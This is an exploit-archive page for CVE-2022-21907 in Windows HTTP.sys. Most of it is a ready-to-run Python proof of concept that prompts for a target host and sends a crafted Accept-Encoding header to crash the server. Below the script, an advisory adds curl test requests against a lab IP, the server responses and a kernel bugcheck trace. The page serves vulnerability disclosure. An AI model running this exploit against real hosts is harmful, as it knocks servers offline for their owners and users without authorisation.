Lucene search

K
packetstormNu11secur1tyPACKETSTORM:165566
HistoryJan 17, 2022 - 12:00 a.m.

HTTP Protocol Stack Denial Of Service / Remote Code Execution

2022-01-1700:00:00
nu11secur1ty
packetstormsecurity.com
604

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

`#!/usr/bin/python  
# Author @nu11secur1ty  
# CVE-2022-21907  
  
from colorama import init, Fore, Back, Style  
init(convert=True)  
import requests  
import time  
  
print(Fore.RED +"Please input your host...\n")  
print(Style.RESET_ALL)  
  
print(Fore.YELLOW)  
host = input()  
print(Style.RESET_ALL)  
  
print(Fore.BLUE +"Sending an especially malicious crafted packet, please  
wait...")  
print(Style.RESET_ALL)  
time.sleep(17)  
  
print(Fore.GREEN)  
# The PoC :)  
poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding':  
'AAAAAAAAAAAAAAAAAAAAAAAA,\  
BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\  
RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\  
TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\  
OOOAOAOOOAOOAOOOAOOOAOOOAOO,\  
****************************stupiD, *, ,',})  
# Not necessary :)  
print(poc,"\n")  
print(Style.RESET_ALL)  
  
  
  
  
  
---- Original Advisory ----  
  
## Title: HTTP.sys buffer overflow denial of service  
## Author: nu11secur1ty  
## Date: 01.12.2022  
## Vendor: https://docs.microsoft.com/  
## Software: https://docs.microsoft.com/en-us/aspnet/core/fundamentals/servers/httpsys?view=aspnetcore-6.0  
## CVE-2022-21907  
  
## Description:  
NOTE: After a couple of hours of tests and experiments, there have  
been no vulnerabilities when we decides to install the IIS packages on  
these Windows platforms, it's ok, and everything is patched! Windows  
Server 2019, Windows 10 version 1809 - 2018 year are not vulnerable by  
default, but the Windows 10 version 2004 - 2020 year the HTTP Protocol  
Stack (HTTP.sys) is vulnerable to buffer overflow - deny of service  
and restart the system.  
The attacker can be sending a maliciously crafted package to the  
headers of the HTTP server of the system and this will be critical for  
this system!  
Not correctly sanitizing!  
Status: CRITICAL  
  
## Simple test connection before debugging  
  
```cmd  
curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package"  
```  
  
- Output:  
  
```cmd  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"  
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>  
<title>404 - File or directory not found.</title>  
<style type="text/css">  
<!--  
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,  
sans-serif;background:#EEEEEE;}  
fieldset{padding:0 15px 10px 15px;}  
h1{font-size:2.4em;margin:0;color:#FFF;}  
h2{font-size:1.7em;margin:0;color:#CC0000;}  
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}  
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px  
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;  
background-color:#555555;}  
#content{margin:0 0 0 2%;position:relative;}  
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}  
-->  
</style>  
</head>  
<body>  
<div id="header"><h1>Server Error</h1></div>  
<div id="content">  
<div class="content-container"><fieldset>  
<h2>404 - File or directory not found.</h2>  
<h3>The resource you are looking for might have been removed, had  
its name changed, or is temporarily unavailable.</h3>  
</fieldset></div>  
</div>  
</body>  
</html>  
```  
## 302  
  
```cmd  
curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package"  
```  
- Output:  
  
```cmd  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"  
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>  
<title>404 - File or directory not found.</title>  
<style type="text/css">  
<!--  
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,  
sans-serif;background:#EEEEEE;}  
fieldset{padding:0 15px 10px 15px;}  
h1{font-size:2.4em;margin:0;color:#FFF;}  
h2{font-size:1.7em;margin:0;color:#CC0000;}  
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}  
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px  
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;  
background-color:#555555;}  
#content{margin:0 0 0 2%;position:relative;}  
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}  
-->  
</style>  
</head>  
<body>  
<div id="header"><h1>Server Error</h1></div>  
<div id="content">  
<div class="content-container"><fieldset>  
<h2>404 - File or directory not found.</h2>  
<h3>The resource you are looking for might have been removed, had  
its name changed, or is temporarily unavailable.</h3>  
</fieldset></div>  
</div>  
</body>  
</html>  
```  
  
## 404  
  
```cmd  
curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package"  
```  
  
- Output:  
  
```cmd  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"  
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>  
<title>404 - File or directory not found.</title>  
<style type="text/css">  
<!--  
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,  
sans-serif;background:#EEEEEE;}  
fieldset{padding:0 15px 10px 15px;}  
h1{font-size:2.4em;margin:0;color:#FFF;}  
h2{font-size:1.7em;margin:0;color:#CC0000;}  
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}  
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px  
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;  
background-color:#555555;}  
#content{margin:0 0 0 2%;position:relative;}  
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}  
-->  
</style>  
</head>  
<body>  
<div id="header"><h1>Server Error</h1></div>  
<div id="content">  
<div class="content-container"><fieldset>  
<h2>404 - File or directory not found.</h2>  
<h3>The resource you are looking for might have been removed, had  
its name changed, or is temporarily unavailable.</h3>  
</fieldset></div>  
</div>  
</body>  
</html>  
```  
  
## Bugcheck:  
  
```cmd  
1: kd> kp  
Child-SP RetAddr Call Site  
ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx  
ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69  
ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0  
ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323  
ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63  
ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5  
ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51  
ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218  
ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7  
ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff  
ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa  
ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112  
ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55  
ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28  
1: kd> !analyze  
*******************************************************************************  
* *  
* Bugcheck Analysis *  
* *  
*******************************************************************************  
  
KERNEL_SECURITY_CHECK_FAILURE (139)  
A kernel component has corrupted a critical data structure. The corruption  
could potentially allow a malicious user to gain control of this machine.  
Arguments:  
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).  
Arg2: ffffa10287993480, Address of the trap frame for the exception  
that caused the bugcheck  
Arg3: ffffa102879933d8, Address of the exception record for the  
exception that caused the bugcheck  
Arg4: 0000000000000000, Reserved  
  
Debugging Details:  
------------------  
  
*** WARNING: Unable to verify timestamp for win32k.sys  
  
BUGCHECK_CODE: 139  
  
BUGCHECK_P1: 3  
  
BUGCHECK_P2: ffffa10287993480  
  
BUGCHECK_P3: ffffa102879933d8  
  
BUGCHECK_P4: 0  
  
PROCESS_NAME: System  
  
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of  
a stack-based buffer in this application. This overrun could  
potentially allow a malicious user to gain control of this  
application.  
  
SYMBOL_NAME: HTTP!UlFreeUnknownCodingList+63  
  
MODULE_NAME: HTTP  
  
IMAGE_NAME: HTTP.sys  
  
FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList  
  
FAILURE_ID_HASH: {1b194f54-2d0b-e3a8-62e2-afded08822bd}  
  
Followup: MachineOwner  
---------  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/Windows10Exploits/edit/master/2022/CVE-2022-21907)  
  
## Proof and Exploit:  
[href](https://streamable.com/fbojva)  
  
`

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H